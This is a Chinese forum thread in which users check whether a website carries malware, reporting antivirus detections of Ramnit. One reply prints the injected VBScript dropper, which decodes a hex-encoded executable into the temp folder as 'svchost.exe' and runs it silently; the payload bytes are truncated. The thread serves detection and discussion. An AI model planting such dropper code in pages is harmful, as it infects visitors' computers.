求鉴定网站是否挂马？

ytysh

Webroot Miss

JAYSIR

卡巴报了，这么多报的估计也是有问题了

Kaspersky用户

谷歌没反应，红伞本地杀了一个

辔繇

curfew

被挂马了
Virus.VBS.Ramnit.c

idxzsthl

麦咖啡拦截。

kxmp

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
......
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

的确有个嵌入的文件 不过这个东西哪怕对新版本的ie都没用吧...

https://www.virustotal.com/zh-cn ... nalysis/1520162504/

WhiteCruel

BD

Trojan.HTML.Ramnit.A

冰晶淑女

火绒也报了

AIYYK

Yandex拦截